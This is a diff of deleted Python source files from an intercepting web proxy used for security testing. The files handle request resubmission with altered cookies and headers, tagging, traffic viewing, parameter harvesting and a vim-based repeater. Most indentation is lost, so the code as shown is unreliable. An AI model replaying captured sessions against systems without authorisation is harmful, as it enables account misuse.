reqs = yield load_reqlist(args.reqids)
for req in reqs:
if clear_cookies:
req.cookies.clear()
newsession.apply_req(req)
conf_message = "You're about to submit %d requests, continue?" % len(reqs)
if not confirm(conf_message):
defer.returnValue(None)
for r in reqs:
r.tags.add('resubmitted')
save = not args.inmem
yield async_submit_requests(reqs, save=save, save_in_mem=args.inmem,
unique_paths=args.uniquepath, unique_path_and_args=args.unique)
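# A few hypothetical invocations (request ids are illustrative; the id list
# is whatever load_reqlist accepts):
#
#   submit 12                      resubmit request 12 as-is
#   submit 12 -m                   resubmit without saving to the data file
#   submit 12 -c session=abcd      apply a cookie before submitting
#   submit 12 -d X-Test=1          apply a header before submitting
#   submit 12 -o 3                 copy the cookies used by request 3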
def load_cmds(cmd):
cmd.set_cmds({
'clrmem': (clrmem, None),
'gencerts': (gencerts, None),
'sv': (save, None),
'export': (export, None),
'log': (log, None),
'merge': (merge_datafile, None),
'nocolor': (run_without_color, None),
'watch': (watch_proxy, None),
'version': (version, None),
'submit': (submit, None)
})
cmd.add_aliases([
#('rpy', ''),
])


@@ -1,102 +0,0 @@
import crochet
import pappyproxy
import shlex
from pappyproxy.plugin import async_main_context_ids
from pappyproxy.util import PappyException, load_reqlist
from twisted.internet import defer
from pappyproxy.http import Request
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def tag(line):
"""
Add a tag to requests.
Usage: tag <tag> [request ids]
You can tag as many requests as you want at the same time. If no
ids are given, the tag will be applied to all in-context requests.
"""
args = shlex.split(line)
if len(args) == 0:
raise PappyException('Tag name is required')
tag = args[0]
if len(args) > 1:
reqids = yield load_reqlist(args[1], False, ids_only=True)
print 'Tagging %s with %s' % (', '.join(reqids), tag)
else:
print "Tagging all in-context requests with %s" % tag
reqids = yield async_main_context_ids()
for reqid in reqids:
req = yield Request.load_request(reqid)
if tag not in req.tags:
req.tags.add(tag)
if req.saved:
yield req.async_save()
else:
print 'Request %s already has tag %s' % (req.reqid, tag)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def untag(line):
"""
Remove a tag from requests
    Usage: untag <tag> [request ids]
You can provide as many request ids as you want and the tag will
be removed from all of them. If no ids are given, the tag will
be removed from all in-context requests.
"""
args = shlex.split(line)
if len(args) == 0:
raise PappyException("Tag and request ids are required")
tag = args[0]
ids = []
if len(args) > 1:
reqids = yield load_reqlist(args[1], False, ids_only=True)
print 'Removing tag %s from %s' % (tag, ', '.join(reqids))
else:
print "Removing tag %s from all in-context requests" % tag
reqids = yield async_main_context_ids()
for reqid in reqids:
req = yield Request.load_request(reqid)
        if tag in req.tags:
            req.tags.discard(tag)
            # Track which requests actually changed for the summary below
            ids.append(req.reqid)
            if req.saved:
                yield req.async_save()
if ids:
print 'Tag %s removed from %s' % (tag, ', '.join(ids))
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def clrtag(line):
"""
Clear all the tags from requests
Usage: clrtag <request ids>
"""
args = shlex.split(line)
if len(args) == 0:
raise PappyException('No request IDs given')
reqs = yield load_reqlist(args[0], False)
for req in reqs:
if req.tags:
req.tags = set()
print 'Tags cleared from request %s' % (req.reqid)
if req.saved:
yield req.async_save()
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'clrtag': (clrtag, None),
'untag': (untag, None),
'tag': (tag, None),
})
cmd.add_aliases([
#('rpy', ''),
])


@@ -1,651 +0,0 @@
import crochet
import datetime
import json
import pappyproxy
import pygments
import pprint
import re
import shlex
import urllib
from pappyproxy.util import PappyException, utc2local, load_reqlist, print_table, print_request_rows, get_req_data_row, datetime_string, maybe_hexdump
from pappyproxy.http import Request, repeatable_parse_qs
from twisted.internet import defer
from pappyproxy.plugin import async_main_context_ids
from pappyproxy.colors import Colors, Styles, verb_color, scode_color, path_formatter, host_color
from pygments.formatters import TerminalFormatter
from pygments.lexers.data import JsonLexer
from pygments.lexers.html import XmlLexer
###################
## Helper functions
def view_full_message(request, headers_only=False, try_ws=False):
def _print_message(mes):
print_str = ''
if mes.direction == 'INCOMING':
print_str += Colors.BLUE
print_str += '< Incoming'
elif mes.direction == 'OUTGOING':
print_str += Colors.GREEN
print_str += '> Outgoing'
else:
print_str += Colors.RED
print_str += '? ERROR: Unknown direction'
if mes.unmangled:
print_str += ', mangled'
print_str += ', binary = %s\n' % mes.is_binary
print_str += Colors.ENDC
print_str += maybe_hexdump(mes.contents)
print_str += '\n'
return print_str
if headers_only:
print request.headers_section_pretty
else:
if try_ws and request.websocket_messages:
print_str = ''
print_str += Styles.TABLE_HEADER
print_str += "Websocket session handshake\n"
print_str += Colors.ENDC
print_str += request.full_message_pretty
print_str += '\n'
print_str += Styles.TABLE_HEADER
print_str += "Websocket session \n"
print_str += Colors.ENDC
for mes in request.websocket_messages:
print_str += _print_message(mes)
if mes.unmangled:
print_str += Colors.YELLOW
print_str += '-'*10
print_str += Colors.ENDC
print_str += ' ^^ UNMANGLED ^^ '
print_str += Colors.YELLOW
print_str += '-'*10
print_str += Colors.ENDC
print_str += '\n'
print_str += _print_message(mes.unmangled)
print_str += Colors.YELLOW
print_str += '-'*20 + '-'*len(' ^^ UNMANGLED ^^ ')
print_str += '\n'
print_str += Colors.ENDC
print print_str
else:
print request.full_message_pretty
def print_request_extended(request):
# Prints extended info for the request
title = "Request Info (reqid=%s)" % request.reqid
print Styles.TABLE_HEADER + title + Colors.ENDC
reqlen = len(request.body)
reqlen = '%d bytes' % reqlen
rsplen = 'No response'
mangle_str = 'Nothing mangled'
if request.unmangled:
mangle_str = 'Request'
if request.response:
response_code = str(request.response.response_code) + \
' ' + request.response.response_text
response_code = scode_color(response_code) + response_code + Colors.ENDC
rsplen = len(request.response.body)
rsplen = '%d bytes' % rsplen
if request.response.unmangled:
if mangle_str == 'Nothing mangled':
mangle_str = 'Response'
else:
mangle_str += ' and Response'
else:
response_code = ''
time_str = '--'
if request.time_start and request.time_end:
time_delt = request.time_end - request.time_start
time_str = "%.2f sec" % time_delt.total_seconds()
if request.is_ssl:
is_ssl = 'YES'
else:
is_ssl = 'NO'
if request.time_start:
time_made_str = datetime_string(request.time_start)
else:
time_made_str = '--'
verb = verb_color(request.verb) + request.verb + Colors.ENDC
host = host_color(request.host) + request.host + Colors.ENDC
print_pairs = []
print_pairs.append(('Made on', time_made_str))
print_pairs.append(('ID', request.reqid))
print_pairs.append(('URL', request.url_color))
print_pairs.append(('Host', host))
print_pairs.append(('Path', path_formatter(request.full_path)))
print_pairs.append(('Verb', verb))
print_pairs.append(('Status Code', response_code))
print_pairs.append(('Request Length', reqlen))
print_pairs.append(('Response Length', rsplen))
if request.response and request.response.unmangled:
print_pairs.append(('Unmangled Response Length', len(request.response.unmangled.full_response)))
print_pairs.append(('Time', time_str))
print_pairs.append(('Port', request.port))
print_pairs.append(('SSL', is_ssl))
print_pairs.append(('Mangled', mangle_str))
print_pairs.append(('Tags', ', '.join(request.tags)))
if request.plugin_data:
print_pairs.append(('Plugin Data', request.plugin_data))
for k, v in print_pairs:
print Styles.KV_KEY+str(k)+': '+Styles.KV_VAL+str(v)
def print_tree(tree):
# Prints a tree. Takes in a sorted list of path tuples
_print_tree_helper(tree, 0, [])
def guess_pretty_print_fmt(msg):
if 'content-type' in msg.headers:
if 'json' in msg.headers['content-type']:
return 'json'
elif 'www-form' in msg.headers['content-type']:
return 'form'
elif 'application/xml' in msg.headers['content-type']:
return 'xml'
return 'text'
def pretty_print_body(fmt, body):
try:
if fmt.lower() == 'json':
d = json.loads(body.strip())
s = json.dumps(d, indent=4, sort_keys=True)
print pygments.highlight(s, JsonLexer(), TerminalFormatter())
elif fmt.lower() == 'form':
qs = repeatable_parse_qs(body)
for k, v in qs.all_pairs():
s = Colors.GREEN
s += '%s: ' % urllib.unquote(k)
s += Colors.ENDC
s += urllib.unquote(v)
print s
elif fmt.lower() == 'text':
print body
elif fmt.lower() == 'xml':
            import xml.dom.minidom
            # Bind the parsed document to its own name instead of shadowing
            # the xml module
            doc = xml.dom.minidom.parseString(body)
            print pygments.highlight(doc.toprettyxml(), XmlLexer(), TerminalFormatter())
else:
raise PappyException('"%s" is not a valid format' % fmt)
except PappyException as e:
raise e
except:
raise PappyException('Body could not be parsed as "%s"' % fmt)
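# For instance (illustrative input), the json branch sorts keys and indents:
#
#   pretty_print_body('json', '{"b": 1, "a": 2}')
#   # highlights and prints:
#   # {
#   #     "a": 2,
#   #     "b": 1
#   # }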
def _get_tree_prefix(depth, print_bars, last):
if depth == 0:
return u''
else:
ret = u''
pb = print_bars + [True]
for i in range(depth):
if pb[i]:
ret += u'\u2502 '
else:
ret += u' '
if last:
ret += u'\u2514\u2500\u2500 '
else:
ret += u'\u251c\u2500\u2500 '
return ret
def _print_tree_helper(tree, depth, print_bars):
# Takes in a tree and prints it at the given depth
if tree == [] or tree == [()]:
return
while tree[0] == ():
tree = tree[1:]
if tree == [] or tree == [()]:
return
if len(tree) == 1 and len(tree[0]) == 1:
print _get_tree_prefix(depth, print_bars + [False], True) + tree[0][0]
return
curkey = tree[0][0]
subtree = []
for row in tree:
if row[0] != curkey:
if curkey == '':
curkey = '/'
print _get_tree_prefix(depth, print_bars, False) + curkey
if depth == 0:
_print_tree_helper(subtree, depth+1, print_bars + [False])
else:
_print_tree_helper(subtree, depth+1, print_bars + [True])
curkey = row[0]
subtree = []
subtree.append(row[1:])
if curkey == '':
curkey = '/'
print _get_tree_prefix(depth, print_bars, True) + curkey
_print_tree_helper(subtree, depth+1, print_bars + [False])
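# Example of the expected input shape (a sorted list of path tuples) and the
# rough rendering, with illustrative paths /, /api/items and /api/users:
#
#   print_tree(sorted([('',), ('api', 'items'), ('api', 'users')]))
#
# prints something along the lines of:
#
#   /
#   api
#       ├── items
#       └── users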
def print_params(req, params=None):
if not req.url_params.all_pairs() and not req.body:
print 'Request %s has no url or data parameters' % req.reqid
print ''
if req.url_params.all_pairs():
print Styles.TABLE_HEADER + "Url Params" + Colors.ENDC
for k, v in req.url_params.all_pairs():
if params is None or (params and k in params):
print Styles.KV_KEY+str(k)+': '+Styles.KV_VAL+str(v)
print ''
if req.body:
print Styles.TABLE_HEADER + "Body/POST Params" + Colors.ENDC
pretty_print_body(guess_pretty_print_fmt(req), req.body)
print ''
if req.cookies.all_pairs():
print Styles.TABLE_HEADER + "Cookies" + Colors.ENDC
for k, v in req.cookies.all_pairs():
if params is None or (params and k in params):
print Styles.KV_KEY+str(k)+': '+Styles.KV_VAL+str(v)
print ''
# multiform request when we support it
def add_param(found_params, kind, k, v, reqid):
    if k not in found_params:
found_params[k] = {}
if kind in found_params[k]:
found_params[k][kind].append((reqid, v))
else:
found_params[k][kind] = [(reqid, v)]
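# found_params accumulates {param_name: {kind: [(reqid, value), ...]}}, e.g.
# (values are illustrative):
#
#   found_params = {}
#   add_param(found_params, 'Cookie', 'session', 'abcd', '1')
#   add_param(found_params, 'Cookie', 'session', 'efgh', '2')
#   # found_params == {'session': {'Cookie': [('1', 'abcd'), ('2', 'efgh')]}}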
def print_param_info(param_info):
for k, d in param_info.iteritems():
print Styles.TABLE_HEADER + k + Colors.ENDC
for param_type, valpairs in d.iteritems():
print param_type
value_ids = {}
for reqid, val in valpairs:
ids = value_ids.get(val, [])
ids.append(reqid)
value_ids[val] = ids
for val, ids in value_ids.iteritems():
if len(ids) <= 15:
idstr = ', '.join(ids)
else:
idstr = ', '.join(ids[:15]) + '...'
if val == '':
printstr = (Colors.RED + 'BLANK' + Colors.ENDC + 'x%d (%s)') % (len(ids), idstr)
else:
printstr = (Colors.GREEN + '%s' + Colors.ENDC + 'x%d (%s)') % (val, len(ids), idstr)
print printstr
print ''
####################
## Command functions
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def list_reqs(line):
"""
List the most recent in-context requests. By default shows the most recent 25
Usage: list [a|num]
If `a` is given, all the in-context requests are shown. If a number is given,
that many requests will be shown.
"""
args = shlex.split(line)
if len(args) > 0:
if args[0][0].lower() == 'a':
print_count = -1
else:
try:
print_count = int(args[0])
except:
print "Please enter a valid argument for list"
return
else:
print_count = 25
rows = []
ids = yield async_main_context_ids(print_count)
for i in ids:
req = yield Request.load_request(i)
rows.append(get_req_data_row(req))
print_request_rows(rows)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_request_info(line):
"""
View information about request
Usage: view_request_info <reqid(s)>
"""
args = shlex.split(line)
if not args:
raise PappyException("Request id is required")
reqids = args[0]
reqs = yield load_reqlist(reqids)
for req in reqs:
print ''
print_request_extended(req)
print ''
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_request_headers(line):
"""
View the headers of the request
Usage: view_request_headers <reqid(s)>
"""
args = shlex.split(line)
if not args:
raise PappyException("Request id is required")
reqid = args[0]
reqs = yield load_reqlist(reqid)
for req in reqs:
if len(reqs) > 1:
print 'Request %s:' % req.reqid
view_full_message(req, True)
if len(reqs) > 1:
print '-'*30
print ''
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_full_request(line):
"""
View the full data of the request
Usage: view_full_request <reqid(s)>
"""
args = shlex.split(line)
if not args:
raise PappyException("Request id is required")
reqid = args[0]
reqs = yield load_reqlist(reqid)
for req in reqs:
if len(reqs) > 1:
print 'Request %s:' % req.reqid
view_full_message(req, try_ws=True)
if len(reqs) > 1:
print '-'*30
print ''
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_request_bytes(line):
"""
View the raw bytes of the request. Use this if you want to redirect output to a file.
Usage: view_request_bytes <reqid(s)>
"""
args = shlex.split(line)
if not args:
raise PappyException("Request id is required")
reqid = args[0]
reqs = yield load_reqlist(reqid)
for req in reqs:
if len(reqs) > 1:
print 'Request %s:' % req.reqid
print req.full_message
if len(reqs) > 1:
print '-'*30
print ''
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def pretty_print_request(line):
"""
Print the body of the request pretty printed.
Usage: pretty_print_request <format> <reqid(s)>
"""
args = shlex.split(line)
if len(args) < 2:
raise PappyException("Usage: pretty_print_request <format> <reqid(s)>")
reqids = args[1]
reqs = yield load_reqlist(reqids)
for req in reqs:
pretty_print_body(args[0], req.body)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_response_headers(line):
"""
View the headers of the response
Usage: view_response_headers <reqid(s)>
"""
reqs = yield load_reqlist(line)
for req in reqs:
if req.response:
if len(reqs) > 1:
print '-'*15 + (' %s ' % req.reqid) + '-'*15
view_full_message(req.response, True)
else:
print "Request %s does not have a response" % req.reqid
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_full_response(line):
"""
View the full data of the response associated with a request
Usage: view_full_response <reqid>
"""
reqs = yield load_reqlist(line)
for req in reqs:
if req.response:
if len(reqs) > 1:
print '-'*15 + (' %s ' % req.reqid) + '-'*15
view_full_message(req.response)
else:
print "Request %s does not have a response" % req.reqid
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def view_response_bytes(line):
"""
View the full data of the response associated with a request
    Usage: view_response_bytes <reqid(s)>
"""
reqs = yield load_reqlist(line)
for req in reqs:
if req.response:
if len(reqs) > 1:
print '-'*15 + (' %s ' % req.reqid) + '-'*15
print req.response.full_message
else:
print "Request %s does not have a response" % req.reqid
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def pretty_print_response(line):
"""
    Print the body of the response pretty printed.
    Usage: pretty_print_response <format> <reqid(s)>
"""
args = shlex.split(line)
if len(args) < 2:
raise PappyException("Usage: pretty_print_request <format> <reqid(s)>")
reqids = args[1]
reqs = yield load_reqlist(reqids)
for req in reqs:
if req.response:
pretty_print_body(args[0], req.response.body)
else:
print 'No response associated with request %s' % req.reqid
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def print_params_cmd(line):
"""
    View the url, body, and cookie parameters of a request
    Usage: print_params <reqid(s)> [key(s)]
"""
args = shlex.split(line)
reqid = args[0]
if len(args) > 1:
keys = args[1:]
else:
keys = None
reqs = yield load_reqlist(reqid)
for req in reqs:
if len(reqs) > 1:
print 'Request %s:' % req.reqid
print_params(req, keys)
if len(reqs) > 1:
print '-'*30
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def get_param_info(line):
args = shlex.split(line)
if args and args[0] == 'ct':
contains = True
args = args[1:]
else:
contains = False
if args:
params = tuple(args)
else:
params = None
def check_key(k, params, contains):
if contains:
for p in params:
if p.lower() in k.lower():
return True
else:
if params is None or k in params:
return True
return False
found_params = {}
ids = yield async_main_context_ids()
for i in ids:
req = yield Request.load_request(i)
for k, v in req.url_params.all_pairs():
if check_key(k, params, contains):
add_param(found_params, 'Url Parameter', k, v, req.reqid)
for k, v in req.post_params.all_pairs():
if check_key(k, params, contains):
add_param(found_params, 'POST Parameter', k, v, req.reqid)
for k, v in req.cookies.all_pairs():
if check_key(k, params, contains):
add_param(found_params, 'Cookie', k, v, req.reqid)
print_param_info(found_params)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def find_urls(line):
args = shlex.split(line)
reqs = yield load_reqlist(args[0])
url_regexp = r'((?:http|ftp|https)://(?:[\w_-]+(?:(?:\.[\w_-]+)+))(?:[\w.,@?^=%&:/~+#-]*[\w@?^=%&/~+#-])?)'
urls = set()
for req in reqs:
urls |= set(re.findall(url_regexp, req.full_message))
if req.response:
urls |= set(re.findall(url_regexp, req.response.full_message))
for url in sorted(urls):
print url
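# For example (hosts are illustrative), the regexp pulls absolute URLs out of
# arbitrary message bodies:
#
#   re.findall(url_regexp, 'see https://example.com/a and http://example.com/b?x=1')
#   # ['https://example.com/a', 'http://example.com/b?x=1']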
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def dump_response(line):
"""
Dump the data of the response to a file.
Usage: dump_response <id> <filename>
"""
# dump the data of a response
args = shlex.split(line)
reqs = yield load_reqlist(args[0])
for req in reqs:
if req.response:
rsp = req.response
if len(args) >= 2:
fname = args[1]
else:
fname = req.path.split('/')[-1]
with open(fname, 'w') as f:
f.write(rsp.body)
print 'Response data written to %s' % fname
else:
print 'Request %s does not have a response' % req.reqid
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def site_map(line):
"""
Print the site map. Only includes requests in the current context.
Usage: site_map
"""
args = shlex.split(line)
if len(args) > 0 and args[0] == 'p':
paths = True
else:
paths = False
ids = yield async_main_context_ids()
paths_set = set()
for reqid in ids:
req = yield Request.load_request(reqid)
if req.response and req.response.response_code != 404:
paths_set.add(req.path_tuple)
tree = sorted(list(paths_set))
if paths:
for p in tree:
print ('/'.join(list(p)))
else:
print_tree(tree)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
'list': (list_reqs, None),
'view_request_info': (view_request_info, None),
'view_request_headers': (view_request_headers, None),
'view_full_request': (view_full_request, None),
'view_request_bytes': (view_request_bytes, None),
'pretty_print_request': (pretty_print_request, None),
'view_response_headers': (view_response_headers, None),
'view_full_response': (view_full_response, None),
'view_response_bytes': (view_response_bytes, None),
'pretty_print_response': (pretty_print_response, None),
'print_params': (print_params_cmd, None),
'param_info': (get_param_info, None),
'site_map': (site_map, None),
'dump_response': (dump_response, None),
'urls': (find_urls, None),
})
cmd.add_aliases([
('list', 'ls'),
('view_request_info', 'viq'),
('view_request_headers', 'vhq'),
('view_full_request', 'vfq'),
('view_full_request', 'kjq'),
('view_request_bytes', 'vbq'),
('pretty_print_request', 'ppq'),
('view_response_headers', 'vhs'),
('view_full_response', 'vfs'),
('view_full_response', 'kjs'),
('view_response_bytes', 'vbs'),
('pretty_print_response', 'pps'),
('print_params', 'pprm'),
('param_info', 'pri'),
('site_map', 'sm'),
#('dump_response', 'dr'),
])


@@ -1,136 +0,0 @@
import base64
import vim
import sys
import socket
import json
class CommError(Exception):
pass
def escape(s):
return s.replace("'", "''")
def communicate(data):
global PAPPY_PORT
# Submits data to the comm port of the proxy
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', int(vim.eval('s:commport'))))
datastr = json.dumps(data)
# Send our data
total_sent = 0
    while total_sent < len(datastr):
sent = s.send(datastr[total_sent:])
assert sent != 0
total_sent += sent
s.send('\n')
# Get our response
retstr = ''
c = ''
while c != '\n':
retstr = retstr + c
c = s.recv(1)
assert c != ''
result = json.loads(retstr)
if not result['success']:
vim.command("echoerr '%s'" % escape(result['message']))
raise CommError(result['message'])
return result
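# The wire format is one JSON object per line in each direction. A request
# looks like (reqid illustrative):
#
#   {"action": "get_request", "reqid": "1"}
#
# followed by a newline, and the reply is a single JSON line whose "success"
# key gates the rest of the payload.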
def read_line(conn):
data = ''
c = ''
while c != '\n':
data = data + c
c = conn.read(1)
return data
def run_command(command):
funcs = {
"setup": set_up_windows,
"submit": submit_current_buffer,
}
if command in funcs:
funcs[command]()
def set_buffer_content(buf, text):
buf[:] = None
first = True
for l in text.split('\n'):
if first:
buf[0] = l
first = False
else:
buf.append(l)
def set_up_windows():
reqid = vim.eval("a:2")
comm_port = vim.eval("a:3")
vim.command("let s:commport=%d"%int(comm_port))
# Get the left buffer
vim.command("new")
vim.command("only")
b2 = vim.current.buffer
vim.command("let s:b2=bufnr('$')")
# Vsplit new file
vim.command("vnew")
b1 = vim.current.buffer
vim.command("let s:b1=bufnr('$')")
# Get the request
comm_data = {"action": "get_request", "reqid": reqid}
try:
reqdata = communicate(comm_data)
except CommError:
return
comm_data = {"action": "get_response", "reqid": reqid}
try:
rspdata = communicate(comm_data)
except CommError:
return
# Set up the buffers
set_buffer_content(b1, base64.b64decode(reqdata['full_message']))
if 'full_message' in rspdata:
set_buffer_content(b2, base64.b64decode(rspdata['full_message']))
# Save the port, ssl, host setting
vim.command("let s:repport=%d" % int(reqdata['port']))
vim.command("let s:rephost='%s'" % escape(reqdata['host']))
if reqdata['is_ssl']:
vim.command("let s:repisssl=1")
else:
vim.command("let s:repisssl=0")
def submit_current_buffer():
curbuf = vim.current.buffer
b2_id = int(vim.eval("s:b2"))
b2 = vim.buffers[b2_id]
vim.command("let s:b1=bufnr('$')")
vim.command("only")
vim.command("rightbelow vertical new")
vim.command("b %d" % b2_id)
vim.command("wincmd h")
full_request = '\n'.join(curbuf)
commdata = {'action': 'submit',
'full_message': base64.b64encode(full_request),
'tags': ['repeater'],
'port': int(vim.eval("s:repport")),
'host': vim.eval("s:rephost")}
if vim.eval("s:repisssl") == '1':
commdata["is_ssl"] = True
else:
commdata["is_ssl"] = False
result = communicate(commdata)
set_buffer_content(b2, base64.b64decode(result['response']['full_message']))
# (left, right) = set_up_windows()
# set_buffer_content(left, 'Hello\nWorld')
# set_buffer_content(right, 'Hello\nOther\nWorld')
#print "Arg is %s" % vim.eval("a:arg")
run_command(vim.eval("a:1"))

File diff suppressed because it is too large


@@ -1,9 +0,0 @@
import subprocess
import os
from pappyproxy import comm
def start_editor(reqid):
script_loc = os.path.join(os.path.dirname(__file__), "vim_repeater", "repeater.vim")
#print "RepeaterSetup %d %d"%(reqid, comm_port)
subprocess.call(["vim", "-S", script_loc, "-c", "RepeaterSetup %s %d"%(reqid, comm.comm_port)])


@@ -1,238 +0,0 @@
import time
import pappyproxy
from .sortedcollection import SortedCollection
from twisted.internet import defer
class RequestCache(object):
"""
An interface for loading requests. Stores a number of requests in memory and
leaves the rest on disk. Transparently handles loading requests from disk.
Most useful functions are :func:`pappyproxy.requestcache.RequestCache.get` to
    get a request by id and :func:`pappyproxy.requestcache.RequestCache.req_it`
to iterate over requests starting with the most recent requests.
:ivar cache_size: The number of requests to keep in memory at any given time. This is the number of requests, so if all of the requests are to download something huge, this could still take up a lot of memory.
:type cache_size: int
"""
def __init__(self, cache_size=100, cust_dbpool=None):
        self._cache_size = cache_size
        # Preload in larger batches for big caches; set the default first so
        # it doesn't clobber the computed limit afterwards
        self._preload_limit = 10
        if cache_size >= 100:
            self._preload_limit = int(cache_size * 0.30)
        self._cached_reqs = {}
        self._last_used = {}
        self._min_time = None
        self.hits = 0
        self.misses = 0
        self.dbpool = cust_dbpool
        self._next_in_mem_id = 1
self.all_ids = set()
self.unmangled_ids = set()
self.ordered_ids = SortedCollection(key=lambda x: -self.req_times[x])
self.inmem_reqs = set()
self.req_times = {}
@property
def hit_ratio(self):
if self.hits == 0 and self.misses == 0:
return 0
return float(self.hits)/float(self.hits + self.misses)
def get_memid(self):
i = 'm%d' % self._next_in_mem_id
self._next_in_mem_id += 1
return i
@defer.inlineCallbacks
def load_ids(self):
if not self.dbpool:
self.dbpool = pappyproxy.http.dbpool
rows = yield self.dbpool.runQuery(
"""
SELECT id, start_datetime FROM requests;
"""
)
for row in rows:
if row[1]:
self.req_times[str(row[0])] = row[1]
else:
self.req_times[str(row[0])] = 0
if str(row[0]) not in self.all_ids:
self.ordered_ids.insert(str(row[0]))
self.all_ids.add(str(row[0]))
rows = yield self.dbpool.runQuery(
"""
SELECT unmangled_id FROM requests
WHERE unmangled_id is NOT NULL;
"""
)
for row in rows:
self.unmangled_ids.add(str(row[0]))
def resize(self, size):
if size >= self._cache_size or size == -1:
self._cache_size = size
else:
while len(self._cached_reqs) > size:
self._evict_single()
self._cache_size = size
@defer.inlineCallbacks
def get(self, reqid):
"""
Get a request by id
"""
if self.check(reqid):
self._update_last_used(reqid)
self.hits += 1
req = self._cached_reqs[reqid]
defer.returnValue(req)
else:
self.misses += 1
newreq = yield pappyproxy.http.Request.load_request(reqid, use_cache=False)
self.add(newreq)
defer.returnValue(newreq)
def check(self, reqid):
"""
Returns True if the id is cached, false otherwise
"""
return reqid in self._cached_reqs
def add(self, req):
"""
Add a request to the cache
"""
if not req.reqid:
req.reqid = self.get_memid()
if req.reqid[0] == 'm':
self.inmem_reqs.add(req)
if req.is_unmangled_version:
self.unmangled_ids.add(req.reqid)
if req.unmangled:
self.unmangled_ids.add(req.unmangled.reqid)
self._cached_reqs[req.reqid] = req
self._update_last_used(req.reqid)
self.req_times[req.reqid] = req.sort_time
if req.reqid not in self.all_ids:
self.ordered_ids.insert(req.reqid)
self.all_ids.add(req.reqid)
if len(self._cached_reqs) > self._cache_size and self._cache_size != -1:
self._evict_single()
def evict(self, reqid):
"""
Remove a request from the cache by its id.
"""
# Remove request from cache
if reqid in self._cached_reqs:
# Remove id from data structures
del self._cached_reqs[reqid]
del self._last_used[reqid]
# New minimum
self._update_min(reqid)
@defer.inlineCallbacks
def load(self, first, num):
"""
Load a number of requests after an id into the cache
"""
reqs = yield pappyproxy.http.Request.load_requests_by_time(first, num, cust_dbpool=self.dbpool, cust_cache=self)
for r in reqs:
self.add(r)
# Bulk loading is faster, so let's just say that loading 10 requests is
# 5 misses. We don't count hits since we'll probably hit them
self.misses += len(reqs)/2.0
def req_it(self, num=-1, ids=None, include_unmangled=False):
"""
A generator over all the requests in history when the function was called.
Generates deferreds which resolve to requests.
"""
count = 0
@defer.inlineCallbacks
def def_wrapper(reqid, load=False, num=1):
if not self.check(reqid) and load:
yield self.load(reqid, num)
req = yield self.get(reqid)
defer.returnValue(req)
over = list(self.ordered_ids)
for reqid in over:
if ids is not None and reqid not in ids:
continue
if not include_unmangled and reqid in self.unmangled_ids:
continue
do_load = True
if reqid in self.all_ids:
if count % self._preload_limit == 0:
do_load = True
if do_load and not self.check(reqid):
do_load = False
if (num - count) < self._preload_limit and num != -1:
loadnum = num - count
else:
loadnum = self._preload_limit
yield def_wrapper(reqid, load=True, num=loadnum)
else:
yield def_wrapper(reqid)
count += 1
if count >= num and num != -1:
break
def req_ids(self, num=-1, ids=None, include_unmangled=False):
"""
Returns a list of IDs
"""
retids = []
over = list(self.ordered_ids)
for reqid in over:
if ids is not None and reqid not in ids:
continue
if not include_unmangled and reqid in self.unmangled_ids:
continue
if reqid in self.all_ids:
retids.append(reqid)
if len(retids) >= num and num != -1:
break
return retids
@defer.inlineCallbacks
def load_by_tag(self, tag):
reqs = yield pappyproxy.http.Request.load_requests_by_tag(tag, cust_cache=self, cust_dbpool=self.dbpool)
for req in reqs:
self.add(req)
defer.returnValue(reqs)
def _evict_single(self):
"""
Evicts one item from the cache
"""
# Get the request
victim_id = self._min_time[0]
self.evict(victim_id)
def _update_min(self, updated_reqid=None):
new_min = None
if updated_reqid is None or self._min_time is None or self._min_time[0] == updated_reqid:
for k, v in self._last_used.iteritems():
if new_min is None or v < new_min[1]:
new_min = (k, v)
self._min_time = new_min
def _update_last_used(self, reqid):
t = time.time()
self._last_used[reqid] = t
self._update_min(reqid)
class RequestCacheIterator(object):
"""
An iterator to iterate over requests in history through the request cache.
"""
pass
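# A hedged usage sketch (run from inside a Twisted reactor with the dbpool
# already configured; error handling omitted):
#
#   @defer.inlineCallbacks
#   def print_recent(cache):
#       yield cache.load_ids()
#       for req_d in cache.req_it(num=10):
#           req = yield req_d
#           print req.reqid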


@@ -1,54 +0,0 @@
from twisted.internet import defer
"""
Schema v1
Description:
The initial schema for the first version of the proxy. It includes the creation
of the schema_meta table and other data tables.
"""
update_queries = [
"""
CREATE TABLE responses (
id INTEGER PRIMARY KEY AUTOINCREMENT,
full_response BLOB NOT NULL,
unmangled_id INTEGER REFERENCES responses(id)
);
""",
"""
CREATE TABLE requests (
id INTEGER PRIMARY KEY AUTOINCREMENT,
full_request BLOB NOT NULL,
tag TEXT,
submitted INTEGER NOT NULL,
response_id INTEGER REFERENCES responses(id),
unmangled_id INTEGER REFERENCES requests(id),
start_datetime TEXT,
end_datetime TEXT
);
""",
"""
CREATE TABLE schema_meta (
version INTEGER NOT NULL
);
""",
"""
CREATE TABLE scope (
filter_order INTEGER NOT NULL,
filter_string TEXT NOT NULL
);
""",
"""
INSERT INTO schema_meta (version) VALUES (1);
""",
]
@defer.inlineCallbacks
def update(dbpool):
for query in update_queries:
yield dbpool.runQuery(query)
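# Every schema module in this series exposes update_queries plus an
# update(dbpool) callback that bumps schema_meta. A sketch of a runner that
# applies whatever is newer than the stored version (the schemas dict mapping
# version number to module is an assumption, not pappy's actual loader):
#
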